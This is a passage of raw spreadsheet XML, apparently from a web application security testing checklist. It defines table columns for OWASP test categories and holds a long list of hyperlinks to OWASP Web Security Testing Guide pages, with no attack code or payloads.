    <tableColumn id="4" name="Tools" dataDxfId="70"/>
    <tableColumn id="5" name="Result" dataDxfId="69"/>
    <tableColumn id="6" name="Remark" dataDxfId="68"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table2.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="2" name="Table2" displayName="Table2" ref="A15:F26" totalsRowShown="0" headerRowDxfId="147" dataDxfId="146">
  <autoFilter ref="A15:F26"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Configuration and Deploy Management Testing" dataDxfId="145"/>
    <tableColumn id="2" name="Test Name" dataDxfId="144"/>
    <tableColumn id="3" name="Description" dataDxfId="143"/>
    <tableColumn id="4" name="Tools" dataDxfId="142"/>
    <tableColumn id="5" name="Result" dataDxfId="141"/>
    <tableColumn id="6" name="Remark" dataDxfId="140"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table3.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="3" name="Table3" displayName="Table3" ref="A35:F45" totalsRowShown="0" headerRowDxfId="139" dataDxfId="138">
  <autoFilter ref="A35:F45"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Authentication Testing" dataDxfId="137"/>
    <tableColumn id="2" name="Test Name" dataDxfId="136"/>
    <tableColumn id="3" name="Description" dataDxfId="135"/>
    <tableColumn id="4" name="Tools" dataDxfId="134"/>
    <tableColumn id="5" name="Result" dataDxfId="133"/>
    <tableColumn id="6" name="Remark" dataDxfId="132"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table4.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="4" name="Table4" displayName="Table4" ref="A53:F62" totalsRowShown="0" headerRowDxfId="131" dataDxfId="130">
  <autoFilter ref="A53:F62"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Session Management Testing" dataDxfId="129"/>
    <tableColumn id="2" name="Test Name" dataDxfId="128"/>
    <tableColumn id="3" name="Description" dataDxfId="127"/>
    <tableColumn id="4" name="Tools" dataDxfId="126"/>
    <tableColumn id="5" name="Result" dataDxfId="125"/>
    <tableColumn id="6" name="Remark" dataDxfId="124"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table5.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="5" name="Table5" displayName="Table5" ref="A47:F51" totalsRowShown="0" headerRowDxfId="123" dataDxfId="122">
  <autoFilter ref="A47:F51"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Authorization Testing " dataDxfId="121"/>
    <tableColumn id="2" name="Test Name" dataDxfId="120"/>
    <tableColumn id="3" name="Description" dataDxfId="119"/>
    <tableColumn id="4" name="Tools" dataDxfId="118"/>
    <tableColumn id="5" name="Result" dataDxfId="117"/>
    <tableColumn id="6" name="Remark" dataDxfId="116"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table6.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="6" name="Table6" displayName="Table6" ref="A104:F113" totalsRowShown="0" headerRowDxfId="115" dataDxfId="114">
  <autoFilter ref="A104:F113"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Business logic Testing" dataDxfId="113"/>
    <tableColumn id="2" name="Test Name" dataDxfId="112"/>
    <tableColumn id="3" name="Description" dataDxfId="111"/>
    <tableColumn id="4" name="Tools" dataDxfId="110"/>
    <tableColumn id="5" name="Result" dataDxfId="109"/>
    <tableColumn id="6" name="Remark" dataDxfId="108"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table7.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="9" name="Table9" displayName="Table9" ref="A64:F92" totalsRowShown="0" headerRowDxfId="107" dataDxfId="106">
  <autoFilter ref="A64:F92"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Input Validation Testing" dataDxfId="105"/>
    <tableColumn id="2" name="Test Name" dataDxfId="104"/>
    <tableColumn id="3" name="Description" dataDxfId="103"/>
    <tableColumn id="4" name="Tools" dataDxfId="102"/>
    <tableColumn id="5" name="Result" dataDxfId="101"/>
    <tableColumn id="6" name="Remark" dataDxfId="100"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table8.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="8" name="Table29" displayName="Table29" ref="A28:F33" totalsRowShown="0" headerRowDxfId="99" dataDxfId="98">
  <autoFilter ref="A28:F33"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Identity Management Testing" dataDxfId="97"/>
    <tableColumn id="2" name="Test Name" dataDxfId="96"/>
    <tableColumn id="3" name="Description" dataDxfId="95"/>
    <tableColumn id="4" name="Tools" dataDxfId="94"/>
    <tableColumn id="5" name="Result" dataDxfId="93"/>
    <tableColumn id="6" name="Remark" dataDxfId="92"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
</file>

<file path=xl/tables/table9.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="13" name="Table614" displayName="Table614" ref="A94:F96" totalsRowShown="0" headerRowDxfId="91" dataDxfId="90">
  <autoFilter ref="A94:F96"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Error Handling" dataDxfId="89"/>
    <tableColumn id="2" name="Test Name" dataDxfId="88"/>
    <tableColumn id="3" name="Description" dataDxfId="87"/>
    <tableColumn id="4" name="Tools" dataDxfId="86"/>
    <tableColumn id="5" name="Result" dataDxfId="85"/>
    <tableColumn id="6" name="Remark" dataDxfId="84"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16"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owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Credentials_Transported_over_an_Encrypted_Channel.html" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/03-Identity_Management_Testing/01-Test_Role_Definitions.html" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/03-Testing_for_Sensitive_Information_Sent_via_Unencrypted_Channels.html" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/05-Authorization_Testing/04-Testing_for_Insecure_Direct_Object_References.html" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing.html" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/12-Testing_Browser_Storage.html" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.html" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.html" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.html" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table11.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/01-Test_Network_Infrastructure_Configuration.html" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Vulnerable_Remember_Password.html" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_for_Weaker_Authentication_in_Alternative_Channel.html" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/06-Session_Management_Testing/06-Testing_for_Logout_Functionality.html" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/02-Testing_for_JavaScript_Execution.html" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/10-Business_Logic_Testing/06-Testing_for_the_Circumvention_of_Work_Flows.html" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.html" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table6.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/01-Information_Gathering/04-Enumerate_Applications_on_Webserver.html" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_Incubated_Vulnerability.html" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/03-Identity_Management_Testing/02-Test_User_Registration_Process.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.html" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption.html" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/06-Session_Management_Testing/01-Testing_for_Session_Management_Schema.html" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/08-Testing_for_Cross_Site_Flashing.html" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/10-Business_Logic_Testing/01-Test_Business_Logic_Data_Validation.html" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.html" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/02-Test_Application_Platform_Configuration.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/07-Test_HTTP_Strict_Transport_Security.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/01-Testing_For_Improper_Error_Handling.html" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/03-Testing_for_HTML_Injection.html" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table7.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/11-Test_Cloud_Storage.html" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/02-Testing_for_Padding_Oracle.html" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/06-Session_Management_Testing/07-Testing_Session_Timeout.html" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/06-Testing_for_Client-side_Resource_Manipulation.html" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/10-Business_Logic_Testing/02-Test_Ability_to_Forge_Requests.html" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/10-Business_Logic_Testing/07-Test_Defenses_Against_Application_Misuse.html" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.html" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.html" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings1.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/10-Test_for_Subdomain_Takeover.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Webpage_Content_for_Information_Leakage.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/05-Enumerate_Infrastructure_and_Application_Admin_Interfaces.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/03-Identity_Management_Testing/03-Test_Account_Provisioning_Process.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weak_Password_Change_or_Reset_Functionalities.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/06-Session_Management_Testing/02-Testing_for_Cookies_Attributes.html" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.html" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table10.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/01-Information_Gathering/10-Map_Application_Architecture.html" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.html" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.html" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.html" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect.html" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking.html" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/10-Business_Logic_Testing/05-Test_Number_of_Times_a_Function_Can_Be_Used_Limits.html" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.html" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.html" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection.html" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.html" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table3.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/01-Information_Gathering/03-Review_Webserver_Metafiles_for_Information_Leakage.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/03-Test_File_Extensions_Handling_for_Sensitive_Information.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/08-Test_RIA_Cross_Domain_Policy.html" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/02-Testing_for_Stack_Traces.html" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Password_Policy.html" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/06-Session_Management_Testing/03-Testing_for_Session_Fixation.html" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/06-Session_Management_Testing/08-Testing_for_Session_Puzzling.html" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/10-Business_Logic_Testing/08-Test_Upload_of_Unexpected_File_Types.html" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table1.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/01-Information_Gathering/06-Identify_Application_Entry_Points.html" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/10-Business_Logic_Testing/03-Test_Integrity_Checks.html" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_HTTP_Incoming_Requests.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/12-API_Testing/01-Testing_GraphQL.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.html" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security.html" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/05-Authorization_Testing/02-Testing_for_Bypassing_Authorization_Schema.html" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets.html" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.html" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/05-Testing_for_CSS_Injection.html" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.html" 